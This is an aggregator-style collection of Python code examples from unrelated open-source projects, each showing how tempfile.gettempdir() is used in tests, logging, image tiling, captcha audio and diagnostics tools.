def setUp(self):
        # Base paths in the real and test file systems.     We keep them different
        # so that missing features in the fake don't fall through to the base
        # operations and magically succeed.
        tsname = 'fakefs.%s' % time.time()
        # Fully expand the base_path - required on OS X.
        self.real_base = os.path.realpath(
                os.path.join(tempfile.gettempdir(), tsname))
        os.chdir(tempfile.gettempdir())
        if os.path.isdir(self.real_base):
            shutil.rmtree(self.real_base)
        os.mkdir(self.real_base)
        self.fake_base = self._FAKE_FS_BASE

        # Make sure we can write to the physical testing temp directory.
        self.assertTrue(os.access(self.real_base, os.W_OK))

        self.fake_filesystem = fake_filesystem.FakeFilesystem()
        self.fake_filesystem.CreateDirectory(self.fake_base)
        self.fake_os = fake_filesystem.FakeOsModule(self.fake_filesystem)
        self.fake_open = fake_filesystem.FakeFileOpen(self.fake_filesystem)
        self._created_files = []

        os.chdir(self.real_base)
        self.fake_os.chdir(self.fake_base)
Ejemplo n.º 2
0
    def test_tmp_dir_normal_2(self):
        tempdir = tempfile.gettempdir()
        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempfile.tempdir)),
            [(tempfile.tempdir, [], [])])


        class WitnessException(Exception):
            pass

        @with_tempdir
        def createfile():
            fd1, fn1 = tempfile.mkstemp()
            fd2, fn2 = tempfile.mkstemp()
            dir = tempfile.mkdtemp()
            fd3, fn3 = tempfile.mkstemp(dir=dir)
            tempfile.mkdtemp()
            for fd in (fd1, fd2, fd3):
                os.close(fd)
            raise WitnessException()

        self.assertRaises(WitnessException, createfile)

        # assert tempdir didn't change
        self.assertEqual(tempfile.gettempdir(), tempdir)

        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])
Ejemplo n.º 3
0
    def __init__(self, icon,menu):
        if sys.platform=="linux2":
            self.menu = menu.gtk_menu
            import appindicator
            self.icon_directory = os.path.sep + 'usr' + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            if not os.path.isdir(self.icon_directory):
							self.icon_directory = os.path.dirname(sys.argv[0]) + os.path.sep + 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            self.statusicon = appindicator.Indicator("new-parrotzik-indicator",
                                           "indicator-messages",
                                           appindicator.CATEGORY_APPLICATION_STATUS)
            self.statusicon.set_status(appindicator.STATUS_ACTIVE)
            self.statusicon.set_icon_theme_path(self.icon_directory)
            self.statusicon.set_menu(self.menu)          
            
        elif sys.platform=="win32":  
            self.menu = menu.gtk_menu          
            self.icon_directory = os.path.dirname(os.path.realpath(sys.argv[0])) + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            self.statusicon = gtk.StatusIcon()            
            self.statusicon.connect("popup-menu", self.gtk_right_click_event)
            self.statusicon.set_tooltip("Parrot Zik")
            self.menu_shown=False
            sys.stdout = open(tempfile.gettempdir()+os.path.sep+"zik_tray_stdout.log", "w")
            sys.stderr = open(tempfile.gettempdir()+os.path.sep+"zik_tray_stderr.log", "w")    

        elif sys.platform=="darwin":
            self.icon_directory = os.path.dirname(os.path.realpath(sys.argv[0])) + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            self.statusicon = StatusApp.sharedApplication()
            self.statusicon.initMenu(menu)
        
        self.setIcon(icon)
Ejemplo n.º 4
0
    def test_set_tmpdir(self):
        """Test set_tmpdir config function."""
        self.purge_environment()

        for tmpdir in [None, os.path.join(tempfile.gettempdir(), 'foo')]:
            parent = tmpdir
            if parent is None:
                parent = tempfile.gettempdir()

            mytmpdir = set_tmpdir(tmpdir=tmpdir)

            for var in ['TMPDIR', 'TEMP', 'TMP']:
                self.assertTrue(os.environ[var].startswith(os.path.join(parent, 'easybuild-')))
                self.assertEqual(os.environ[var], mytmpdir)
            self.assertTrue(tempfile.gettempdir().startswith(os.path.join(parent, 'easybuild-')))
            tempfile_tmpdir = tempfile.mkdtemp()
            self.assertTrue(tempfile_tmpdir.startswith(os.path.join(parent, 'easybuild-')))
            fd, tempfile_tmpfile = tempfile.mkstemp()
            self.assertTrue(tempfile_tmpfile.startswith(os.path.join(parent, 'easybuild-')))

            # cleanup
            os.close(fd)
            shutil.rmtree(mytmpdir)
            modify_env(os.environ, self.orig_environ)
            tempfile.tempdir = None
Ejemplo n.º 5
0
    def test_tmp_dir_normal_1(self):
        tempdir = tempfile.gettempdir()
        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])

        witness = []

        @with_tempdir
        def createfile(list):
            fd1, fn1 = tempfile.mkstemp()
            fd2, fn2 = tempfile.mkstemp()
            dir = tempfile.mkdtemp()
            fd3, fn3 = tempfile.mkstemp(dir=dir)
            tempfile.mkdtemp()
            list.append(True)
            for fd in (fd1, fd2, fd3):
                os.close(fd)

        self.assertFalse(witness)
        createfile(witness)
        self.assertTrue(witness)

        self.assertEqual(tempfile.gettempdir(), tempdir)

        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])
Ejemplo n.º 6
0
def captcha_audio(request, key):
    if settings.CAPTCHA_FLITE_PATH:
        try:
            store = CaptchaStore.objects.get(hashkey=key)
        except CaptchaStore.DoesNotExist:
            # HTTP 410 Gone status so that crawlers don't index these expired urls.
            return HttpResponse(status=410)

        text = store.challenge
        if 'captcha.helpers.math_challenge' == settings.CAPTCHA_CHALLENGE_FUNCT:
            text = text.replace('*', 'times').replace('-', 'minus').replace('+', 'plus')
        else:
            text = ', '.join(list(text))
        path = str(os.path.join(tempfile.gettempdir(), '%s.wav' % key))
        subprocess.call([settings.CAPTCHA_FLITE_PATH, "-t", text, "-o", path])

        # Add arbitrary noise if sox is installed
        if settings.CAPTCHA_SOX_PATH:
            arbnoisepath = str(os.path.join(tempfile.gettempdir(), '%s_arbitrary.wav') % key)
            mergedpath = str(os.path.join(tempfile.gettempdir(), '%s_merged.wav') % key)
            subprocess.call([settings.CAPTCHA_SOX_PATH, '-r', '8000', '-n', arbnoisepath, 'synth', '2', 'brownnoise', 'gain', '-15'])
            subprocess.call([settings.CAPTCHA_SOX_PATH, '-m', arbnoisepath, path, '-t', 'wavpcm', '-b', '16', mergedpath])
            os.remove(arbnoisepath)
            os.remove(path)
            os.rename(mergedpath, path)

        if os.path.isfile(path):
            response = RangedFileResponse(request, open(path, 'rb'), content_type='audio/wav')
            response['Content-Disposition'] = 'attachment; filename="{}.wav"'.format(key)
            return response
    raise Http404
Ejemplo n.º 7
0
    def train_from_file(self, conll_file, verbose=False):
        """
        Train MaltParser from a file
        
        :param conll_file: str for the filename of the training input data
        """
        if not self._malt_bin:
            raise Exception("MaltParser location is not configured.  Call config_malt() first.")

        # If conll_file is a ZipFilePathPointer, then we need to do some extra massaging
        f = None
        if hasattr(conll_file, 'zipfile'):
            zip_conll_file = conll_file
            conll_file = os.path.join(tempfile.gettempdir(),'malt_train.conll')
            conll_str = zip_conll_file.open().read()
            f = open(conll_file,'w')
            f.write(conll_str)
            f.close()        

        cmd = ['java', '-jar %s' % self._malt_bin, '-w %s' % tempfile.gettempdir(), 
               '-c %s' % self.mco, '-i %s' % conll_file, '-m learn']
        
#        p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
#                             stderr=subprocess.STDOUT,
#                             stdin=subprocess.PIPE)
#        (stdout, stderr) = p.communicate()
                
        self._execute(cmd, 'train', verbose)
        
        self._trained = True
Ejemplo n.º 8
0
    def exportAction(self):
        """
        Export Action
        """
        tempfile.gettempdir()
        base_url = self.exportSettings.server_url
        pack_name = self.exportSettings.pack
        export_dir = self.getExportDir()

        self.addStatus("Exporting to " + export_dir, IMMEDIATE)

        destfolder = os.path.join(export_dir, 'b2rx_export')
        if not os.path.exists(destfolder):
            os.makedirs(destfolder)
        else:
            shutil.rmtree(destfolder)
            os.makedirs(destfolder)

        x = self.exportSettings.locX.getValue()
        y = self.exportSettings.locY.getValue()
        z = self.exportSettings.locZ.getValue()

        self.export(destfolder, pack_name, [x, y, z], self.exportSettings)
        dest_file = os.path.join(export_dir, "world_pack.zip")
        self.packTo(destfolder, dest_file)

        self.addStatus("Exported to " + dest_file)
Ejemplo n.º 9
0
 def processImage(self):
   """ starting with the original image, start processing each row """
   tier=(len(self._v_scaleInfo) -1)
   row = 0
   ul_y, lr_y = (0,0)
   root, ext = os.path.splitext(self._v_imageFilename)  
   if not root:
     root = self._v_imageFilename
   ext = '.jpg'
   while row * self.tileSize < self.originalHeight:
     ul_y = row * self.tileSize
     if (ul_y + self.tileSize) < self.originalHeight:
       lr_y = ul_y + self.tileSize
     else:
       lr_y = self.originalHeight
     image = self.openImage()
     imageRow = image.crop([0, ul_y, self.originalWidth, lr_y])
     saveFilename = root + str(tier) + '-' + str(row) +  ext
     if imageRow.mode != 'RGB':
       imageRow = imageRow.convert('RGB')
     imageRow.save(os.path.join(tempfile.gettempdir(), saveFilename), 'JPEG', quality=100)
     image = None
     imageRow = None
     if os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename)): 
       self.processRowImage(tier=tier, row=row)
     row += 1
Ejemplo n.º 10
0
def getTempFilePath(base, counter):
    # does not guarantee it is new, just converts this into the path
    dir = tempfile.gettempdir()
    base = "_15112_autograder_" + str(base) + "_"
    fileName = base + str(counter)
    filePath = os.path.join(tempfile.gettempdir(), fileName)
    return filePath
Ejemplo n.º 11
0
  def __init__(self, host_name="localhost", port=None, user_name=None, password=None,
      db_name=None, log_sql=False):
    self._host_name = host_name
    self._port = port or self.PORT
    self._user_name = user_name or self.USER_NAME
    self._password = password or self.PASSWORD
    self.db_name = db_name
    self._conn = None
    self._connect()

    if log_sql:
      with DbConnection.LOCK:
        sql_log_path = gettempdir() + '/sql_log_%s_%s.sql' \
              % (self.db_type.lower(), time())
        self.sql_log = open(sql_log_path, 'w')
        link = gettempdir() + '/sql_log_%s.sql' % self.db_type.lower()
        try:
          unlink(link)
        except OSError as e:
          if 'No such file' not in str(e):
            raise e
        try:
          symlink(sql_log_path, link)
        except OSError as e:
          raise e
    else:
      self.sql_log = None
Ejemplo n.º 12
0
def mount(location, access='rw'):
    '''
    Mount an image

    CLI Example:

    .. code-block:: bash

        salt '*' guest.mount /srv/images/fedora.qcow
    '''
    root = os.path.join(
            tempfile.gettempdir(),
            'guest',
            location.lstrip(os.sep).replace('/', '.')
            )
    if not os.path.isdir(root):
        try:
            os.makedirs(root)
        except OSError:
            # somehow the directory already exists
            pass
    while True:
        if os.listdir(root):
            # Stuf is in there, don't use it
            rand = hashlib.md5(str(random.randint(1, 1000000))).hexdigest()
            root = os.path.join(
                tempfile.gettempdir(),
                'guest',
                location.lstrip(os.sep).replace('/', '.') + rand
                )
        else:
            break
    cmd = 'guestmount -i -a {0} --{1} {2}'.format(location, access, root)
    __salt__['cmd.run'](cmd)
    return root
Ejemplo n.º 13
0
def remove_graph_viz_temporaries():
    """ remove_graph_viz_temporaries() -> None
    Removes temporary files generated by dot

    """
    os.unlink(tempfile.gettempdir() + "dot_output_vistrails.txt")
    os.unlink(tempfile.gettempdir() + "dot_tmp_vistrails.txt")
Ejemplo n.º 14
0
def get_args_parser():
  """Creates the argument parser and adds the flags"""
  parser = argparse.ArgumentParser(
      description="Impala diagnostics collection",
      formatter_class=argparse.ArgumentDefaultsHelpFormatter)
  parser.add_argument("--pid", required=True, action="store", dest="pid", type=int,
      default=0, help="PID of the Impala process for which to collect diagnostics.")
  parser.add_argument("--java_home", action="store", dest="java_home", default="",
      help="If not set, it is set to the JAVA_HOME from the pid's environment.")
  parser.add_argument("--timeout", action="store", dest="timeout", default=300,
      type=int, help="Timeout (in seconds) for each of the diagnostics commands")
  parser.add_argument("--stacks", action="store", dest="stacks", nargs=2, type=int,
      default=[0, 0], metavar=("COUNT", "INTERVAL (in seconds)"),
      help="Collect jstack, mixed-mode jstack and pstacks of the Impala process.\
      Breakpad minidumps are collected in case of missing pstack binaries.")
  parser.add_argument("--jmap", action="store_true", dest="jmap", default=False,
      help="Collect heap dump of the Java process")
  parser.add_argument("--gcore", action="store_true", dest="gcore", default=False,
      help="Collect the native core dump using gdb. Requires gdb to be installed.")
  parser.add_argument("--minidumps", action="store", dest="minidumps", type=int,
      nargs=2, default=[0, 0], metavar=("COUNT", "INTERVAL (in seconds)"),
      help="Collect breakpad minidumps for the Impala process. Requires --minidumps_dir\
      be set.")
  parser.add_argument("--minidumps_dir", action="store", dest="minidumps_dir", default="",
      help="Path of the directory to which Impala process' minidumps are written")
  parser.add_argument("--profiles_dir", action="store", dest="profiles_dir", default="",
      help="Path of the profiles directory to be included in the diagnostics output.")
  parser.add_argument("--profiles_max_size_limit", action="store",
      dest="profiles_max_size_limit", default=3 * 1024 * 1024 * 1024, type=float,
      help="Uncompressed limit (in Bytes) on profile logs collected from --profiles_dir.")
  parser.add_argument("--output_dir", action="store", dest="output_dir",
      default = tempfile.gettempdir(), help="Output directory that contains the final "
      "diagnostics data. Defaults to %s" % tempfile.gettempdir())
  return parser
def main():
  globs_to_delete = [
    # Clears run_isolated.zip.
    'run_isolated.zip',

    # Clears temporary directories generated by run_isolated.py.
    'run_tha_test*',
    'isolated_out*',

    # Clears temporary directories generated by Chromium tests.
    # TODO(maruel): This doesn't belong here, I wish these tests stopped
    # leaking.
    os.path.join(tempfile.gettempdir(), 'scoped_dir*'),
    os.path.join(tempfile.gettempdir(), 'zip_package*'),
  ]
  if sys.platform == 'win32':
    globs_to_delete.append(
        os.path.join(
            os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft',
            'Windows', 'Recent', 'CustomDestinations', '*'))

  iterables = (glob.iglob(g) for g in globs_to_delete)
  for filename in itertools.chain.from_iterable(iterables):
    delete(filename)

  print ''
  return 0
Ejemplo n.º 16
0
    def test_source_escaping2(self):
        def create_test_db(dbfile):
            if os.path.exists(dbfile):
                os.remove(dbfile)
            con = spatialite_connect(dbfile)
            cur = con.cursor()
            cur.execute("SELECT InitSpatialMetadata(1)")
            cur.execute("CREATE TABLE test (id INTEGER, name TEXT)")
            cur.execute("SELECT AddGeometryColumn('test', 'geometry', 4326, 'POINT', 'XY')")
            sql = "INSERT INTO test (id, name, geometry) "
            sql += "VALUES (1, 'toto',GeomFromText('POINT(0 0)',4326))"
            cur.execute(sql)
            con.close()

        # the source contains ',' and single quotes
        fn = os.path.join(tempfile.gettempdir(), "test,.db")
        create_test_db(fn)
        source = "dbname='%s' table=\"test\" (geometry) sql=" % fn
        d = QgsVirtualLayerDefinition()
        d.addSource("t", source, "spatialite")
        l = QgsVectorLayer(d.toString(), "vtab", "virtual", False)
        self.assertEqual(l.isValid(), True)

        # the source contains ':' and single quotes
        fn = os.path.join(tempfile.gettempdir(), "test:.db")
        create_test_db(fn)
        source = "dbname='%s' table=\"test\" (geometry) sql=" % fn
        d = QgsVirtualLayerDefinition()
        d.addSource("t", source, "spatialite")
        l = QgsVectorLayer(d.toString(), "vtab", "virtual", False)
        self.assertEqual(l.isValid(), True)
Ejemplo n.º 17
0
  def __init__(self, cursors, sql_writers, query_timeout_seconds):
    '''cursors should be a list of db_connector.Cursors.

       sql_writers should be a list of model_translator.SqlWriters, with translators in
       the same order as cursors in "cursors".
    '''
    self.query_timeout_seconds = query_timeout_seconds
    self.cursors = cursors
    self.sql_writers = sql_writers
    self.query_logs = list()


    for cursor in cursors:
      # A list of all queries attempted
      query_log_path = gettempdir() + '/test_query_log_%s_%s.sql' \
          % (cursor.connection.db_type.lower(), time())
      self.query_logs.append(open(query_log_path, 'w'))
      link = gettempdir() + '/test_query_log_%s.sql' % cursor.connection.db_type.lower()
      try:
        unlink(link)
      except OSError as e:
        if not 'No such file' in str(e):
          raise e
      try:
        symlink(query_log_path, link)
      except OSError as e:
        # TODO: Figure out what the error message is where there is a race condition
        #       and ignore it.
        raise e

    # In case the query will be executed as a "CREATE TABLE <name> AS ..." or
    # "CREATE VIEW <name> AS ...", this will be the value of "<name>".
    self._table_or_view_name = None
Ejemplo n.º 18
0
    def _geo_img_diff(self, image_1, image_2):
        if os.name == 'nt':
            # Not supported on Windows due to #13061
            return 0

        with open(os.path.join(tempfile.gettempdir(), image_2), "wb") as f:
            f.write(image_1)
        image_1 = gdal.Open(os.path.join(tempfile.gettempdir(), image_2), GA_ReadOnly)
        assert image_1, "No output image written: " + image_2

        image_2 = gdal.Open(os.path.join(self.testdata_path, "results", image_2), GA_ReadOnly)
        assert image_1, "No expected image found:" + image_2

        if image_1.RasterXSize != image_2.RasterXSize or image_1.RasterYSize != image_2.RasterYSize:
            image_1 = None
            image_2 = None
            return 1000  # wrong size

        square_sum = 0
        for x in range(image_1.RasterXSize):
            for y in range(image_1.RasterYSize):
                square_sum += (image_1.ReadAsArray()[x][y] - image_2.ReadAsArray()[x][y]) ** 2

        # Explicitly close GDAL datasets
        image_1 = None
        image_2 = None
        return sqrt(square_sum)
Ejemplo n.º 19
0
def create_logger(module):
    """ Creates a logger and spits out result into a temp file that is named accordinly
    Args:
        module (str): module name
    Returns (logging.logger)
    Usage:
        create_logger('test')
    """
    logger = logging.getLogger("variableFK")
    filename = "log_%s.txt" % module

    if logger.handlers:
        logger.handlers = []
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")

    fh = logging.FileHandler(os.path.join(tempfile.gettempdir(), filename))
    open(os.path.join(tempfile.gettempdir(), filename), "w").close()

    fh.setLevel(logging.DEBUG)
    fh.setFormatter(formatter)

    logger.addHandler(fh)

    return logger
Ejemplo n.º 20
0
    def test_multi_proc(self):
        json_conf = configurator.to_json(None)
        json_conf["pick"]["run_options"]["procs"] = 2
        json_conf["pick"]["files"]["input"] = pkg_resources.resource_filename("Mikado.tests",
                                                                              "mikado_prepared.gtf")
        json_conf["pick"]["files"]["output_dir"] = tempfile.gettempdir()
        json_conf["pick"]["files"]["loci_out"] = "mikado.multiproc.loci.gff3"
        json_conf["pick"]["files"]["subloci_out"] = "mikado.multiproc.subloci.gff3"
        json_conf["pick"]["files"]["monoloci_out"] = "mikado.multiproc.monoloci.gff3"
        json_conf["pick"]["files"]["log"] = "mikado.multiproc.log"
        json_conf["db_settings"]["db"] = pkg_resources.resource_filename("Mikado.tests", "mikado.db")
        json_conf["log_settings"]["log_level"] = "WARNING"

        pick_caller = picker.Picker(json_conf=json_conf)
        with self.assertRaises(SystemExit), self.assertLogs("main_logger", "INFO"):
            pick_caller()
        self.assertTrue(os.path.exists(os.path.join(tempfile.gettempdir(), "mikado.multiproc.loci.gff3")))
        with to_gff(os.path.join(tempfile.gettempdir(), "mikado.multiproc.loci.gff3")) as inp_gff:
            lines = [_ for _ in inp_gff if not _.header is True]
            self.assertGreater(len(lines), 0)
            self.assertGreater(len([_ for _ in lines if _.is_transcript is True]), 0)
            self.assertGreater(len([_ for _ in lines if _.feature == "mRNA"]), 0)
            self.assertGreater(len([_ for _ in lines if _.feature == "CDS"]), 0)

        [os.remove(_) for _ in glob.glob(os.path.join(tempfile.gettempdir(), "mikado.multiproc.") + "*")]
Ejemplo n.º 21
0
def run_experiments():
    logging.basicConfig(level = logging.INFO)

    logfolder = os.path.join(tempfile.gettempdir(), TEMPDIR, 'logs')
    pathfolder = os.path.join(tempfile.gettempdir(), TEMPDIR, 'hdf5')


    exponents = np.arange(0, 8, 1)
    res_per_run = 100
    traj_names = []
    filenames = []
    runs = (np.ones(len(exponents))*2) ** exponents
    for adx, nruns in enumerate(runs):
        env = Environment(log_folder=logfolder, filename=pathfolder,
                          ncores=2, multiproc=True,
                          use_pool=True,
                          wrap_mode='QUEUE')

        traj = env.v_trajectory

        traj.f_add_parameter('res_per_run', res_per_run)
        traj.f_add_parameter('trial', 0)

        traj.f_explore({'trial': list(range(int(nruns)))})


        env.f_run(add_data)

        traj_names.append(traj.v_name)
        filenames.append(traj.v_storage_service.filename)

    return filenames, traj_names, pathfolder
Ejemplo n.º 22
0
 def processImage(self):
     """ starting with the original image, start processing each row """
     tier = len(self._v_scaleInfo) - 1
     row = 0
     ul_y, lr_y = (0, 0)
     root, ext = os.path.splitext(self._v_imageFilename)
     if not root:
         root = self._v_imageFilename
     ext = ".jpg"
     image = self.openImage()
     while row * self.tileSize < self.originalHeight:
         ul_y = row * self.tileSize
         if (ul_y + self.tileSize) < self.originalHeight:
             lr_y = ul_y + self.tileSize
         else:
             lr_y = self.originalHeight
         print "Going to open image"
         imageRow = image.crop([0, ul_y, self.originalWidth, lr_y])
         saveFilename = root + str(tier) + "-" + str(row) + ext
         if imageRow.mode != "RGB":
             imageRow = imageRow.convert("RGB")
         imageRow.save(os.path.join(tempfile.gettempdir(), saveFilename), "JPEG", quality=100)
         print "os path exist : %r" % os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename))
         if os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename)):
             self.processRowImage(tier=tier, row=row)
         row += 1
def _create_db_tables_and_add_users():
    ctx.logger.info('Creating SQL tables and adding admin users...')
    create_script_path = 'components/restservice/config' \
                         '/create_tables_and_add_users.py'
    create_script_destination = join(tempfile.gettempdir(),
                                     'create_tables_and_add_users.py')
    ctx.download_resource(source=create_script_path,
                          destination=create_script_destination)
    # Directly calling with this python bin, in order to make sure it's run
    # in the correct venv
    python_path = '{0}/env/bin/python'.format(REST_SERVICE_HOME)
    runtime_props = ctx.instance.runtime_properties

    args_dict = json.loads(runtime_props['security_configuration'])
    args_dict['postgresql_host'] = runtime_props['postgresql_host']

    # The script won't have access to the ctx, so we dump the relevant args
    # to a JSON file, and pass its path to the script
    args_file_location = join(tempfile.gettempdir(), 'security_config.json')
    with open(args_file_location, 'w') as f:
        json.dump(args_dict, f)

    result = utils.sudo(
        [python_path, create_script_destination, args_file_location]
    )

    _log_results(result)
    utils.remove(args_file_location)
Ejemplo n.º 24
0
def main():
	
	parser = argparse.ArgumentParser()
	parser.add_argument("--file", help="Target file for the compressed Build")
	parser.add_argument("--config", help="Select the configuration", default="Release")
	args = parser.parse_args()

	print(args.file)
	print(args.config)
	print(tempfile.gettempdir())

	prodbg_path = os.path.join(tempfile.gettempdir(), "prodbg")

	if (os.path.isdir(prodbg_path)):
		shutil.rmtree(prodbg_path)
	
	os.makedirs(prodbg_path)

	config_path = getConfigPath(args.config)

	# copy all the data to tempory directy

	copyDir(prodbg_path, os.path.join(config_path), ('*.pdb', '*.obj', '*.ilk', '*.lib', '*.exp', '*.exe')) 
	copyDir(prodbg_path, "temp", None) 
	copyDir(prodbg_path, "data", None) 
	copyFile(prodbg_path, os.path.join(config_path, "prodbg.exe"))

	# Compress to zip file

	zipBuild(args.file, prodbg_path)
Ejemplo n.º 25
0
def unzip(fhash,filename):
	(prefix, sep, suffix) = filename.rpartition('.')
	if remove_directory:
		prefix = directory+"/"+os.path.basename(prefix);
	found = 0;
	try:
		with zipfile.ZipFile(tempfile.gettempdir()+"/"+fhash+".zip") as zf:
			for member in zf.infolist():
				words = member.filename.split('/')
				path = "./"

				for word in words[:-1]:
					drive, word = os.path.splitdrive(word);
					head, word = os.path.split(word);
					if word in (os.curdir, os.pardir, ''): continue
					path = os.path.join(path, word);

				if re.match(r".*[.](srt|sub|ass)$",words[0].lower()) != None:
					zf.extract(member, tempfile.gettempdir()+"/");
					shutil.move(tempfile.gettempdir()+"/"+words[0], prefix+"."+(re.findall(r".*[.](srt|sub|ass)$",words[0].lower())[0]));
					if removeAd:
						adBlock(prefix+"."+(re.findall(r".*[.](srt|sub|ass)$",words[0].lower())[0]));
					found += 1;

	except zipfile.BadZipfile:
		os.unlink(tempfile.gettempdir()+"/"+fhash+".zip");
		raise Exception("Can't extract subtitles from downloaded file.")

	if found == 0:
		os.unlink(tempfile.gettempdir()+"/"+fhash+".zip");
		raise Exception("Subtitle file not found in archive.")
Ejemplo n.º 26
0
def pre_start_restore():
  """
  Restores the flume config, config dir, file/spillable channels to their proper locations
  after an upgrade has completed.
  :return:
  """
  Logger.info('Restoring Flume data and configuration after upgrade...')
  directoryMappings = _get_directory_mappings()

  for directory in directoryMappings:
    archive = os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR,
      directoryMappings[directory])

    if os.path.isfile(archive):
      Logger.info('Extracting {0} to {1}'.format(archive, directory))
      tarball = None
      try:
        tarball = tarfile.open(archive, "r")
        tarball.extractall(directory)
      finally:
        if tarball:
          tarball.close()

    # cleanup
    if os.path.exists(os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR)):
      shutil.rmtree(os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR))
Ejemplo n.º 27
0
    def setUp(self):

        def createlayer(driver):
            lyr = shp.CreateLayer("edges", None, ogr.wkbLineString)
            namedef = ogr.FieldDefn("Name", ogr.OFTString)
            namedef.SetWidth(32)
            lyr.CreateField(namedef)
            return lyr

        drv = ogr.GetDriverByName("ESRI Shapefile")

        testdir = os.path.join(tempfile.gettempdir(),'shpdir')
        shppath = os.path.join(tempfile.gettempdir(),'tmpshp.shp')

        self.deletetmp(drv, testdir, shppath)
        os.mkdir(testdir)

        shp = drv.CreateDataSource(shppath)
        lyr = createlayer(shp)
        self.names = ['a','b','c']  #edgenames
        self.paths = (  [(1.0, 1.0), (2.0, 2.0)],
                        [(2.0, 2.0), (3.0, 3.0)],
                        [(0.9, 0.9), (4.0, 2.0)]
                    )
        for path,name in zip(self.paths, self.names):
            feat = ogr.Feature(lyr.GetLayerDefn())
            g = ogr.Geometry(ogr.wkbLineString)
            map(lambda xy: g.AddPoint_2D(*xy), path)
            feat.SetGeometry(g)
            feat.SetField("Name", name)
            lyr.CreateFeature(feat)
        self.shppath = shppath
        self.testdir = testdir
        self.drv = drv
  def testUnzipFileContainingLongPath(self):
    try:
      dir_path = self.tmp_dir
      if sys.platform.startswith('win'):
        dir_path = u'\\\\?\\' + dir_path

      archive_suffix = ''
      # 260 is the Windows API path length limit.
      while len(archive_suffix) < 260:
        archive_suffix = os.path.join(archive_suffix, 'really')
      contents_dir_path = os.path.join(dir_path, archive_suffix)
      os.makedirs(contents_dir_path)
      filename = os.path.join(contents_dir_path, 'longpath.txt')
      open(filename, 'a').close()

      base_path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
      archive_path = shutil.make_archive(base_path, 'zip', dir_path)
      self.assertTrue(os.path.exists(archive_path))
      self.assertTrue(zipfile.is_zipfile(archive_path))
    except:
      if os.path.isfile(archive_path):
        os.remove(archive_path)
      raise

    unzip_path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
    dependency_manager_util.UnzipArchive(archive_path, unzip_path)
    dependency_manager_util.RemoveDir(unzip_path)
Ejemplo n.º 29
0
def trim_any_leftovers():
    print tempfile.gettempdir()
    leftovers = glob.glob(os.path.join(tempfile.gettempdir(), 'mcworld_*', ''))
    for d in leftovers:
        print "Found left over directory: {}".format(d)
        if DO_REMOVE:
            shutil.rmtree(d, ignore_errors=True)
Ejemplo n.º 30
0
    def test_index(self):

        # Create the list of files
        files = ["trinity.gtf",
                 "trinity.gff3",
                 "trinity.cDNA_match.gff3",
                 "trinity.match_matchpart.gff3"]
        # files = [pkg_resources.resource_filename("Mikado.tests", filename) for filename in files]

        namespace = Namespace(default=False)
        namespace.distance = 2000
        namespace.index = True
        namespace.prediction = None
        namespace.log = os.path.join(tempfile.gettempdir(), "index.log")
        logger = create_null_logger("null")

        for ref in files:
            with self.subTest(ref=ref):
                temp_ref = os.path.join(tempfile.gettempdir(), ref)
                with pkg_resources.resource_stream("Mikado.tests", ref) as ref_handle,\
                        open(temp_ref, "wb") as out_handle:
                    out_handle.write(ref_handle.read())
                namespace.reference = to_gff(temp_ref)
                compare(namespace)

                self.assertTrue(os.path.exists(namespace.log))
                self.assertTrue(os.path.exists("{}.midx".format(namespace.reference.name)))
                self.assertGreater(os.stat("{}.midx".format(namespace.reference.name)).st_size, 0)
                genes, positions = load_index(namespace, logger)
                self.assertIsInstance(genes, dict)
                self.assertIsInstance(positions, dict)
                self.assertEqual(len(genes), 38)
                os.remove(namespace.reference.name)
                os.remove(namespace.log)
                os.remove("{}.midx".format(namespace.reference.name))
Ejemplo n.º 31
0
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'shuup.front.middleware.ProblemMiddleware',
    'shuup.core.middleware.ShuupMiddleware',
    'shuup.front.middleware.ShuupFrontMiddleware',
    'shuup.admin.middleware.ShuupAdminMiddleware'
]

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(tempfile.gettempdir(), 'shuup_mailchimp.sqlite3'),
    }
}

MEDIA_ROOT = os.path.join(os.path.dirname(__file__), "var", "media")

STATIC_URL = "static/"

ROOT_URLCONF = 'shuup_workbench.urls'

LANGUAGES = [
    ('en', 'English'),
    ('fi', 'Finnish'),
]

USE_TZ = True
Ejemplo n.º 32
0
import tempfile
from os.path import isfile, join
import requests
from pymol2 import SingletonPyMOL

PDB_ID = "1l2y"
CIF_PATH = join(tempfile.gettempdir(), PDB_ID + ".cif")
PNG_PATH = join(tempfile.gettempdir(), "pymol_test.png")

r = requests.get(f"https://files.rcsb.org/download/{PDB_ID}.cif")
with open(CIF_PATH, "w") as file:
    file.write(r.text)

pymol = SingletonPyMOL()
pymol.start()
cmd = pymol.cmd

cmd.load(CIF_PATH)

# Test rendering
cmd.png(PNG_PATH, ray=1)
assert isfile(PNG_PATH)

# Test correct integration of NumPy
assert cmd.get_coordset(PDB_ID).shape == (304, 3)
Ejemplo n.º 33
0
def test_ftp_destination(sdc_builder, sdc_executor, ftp):
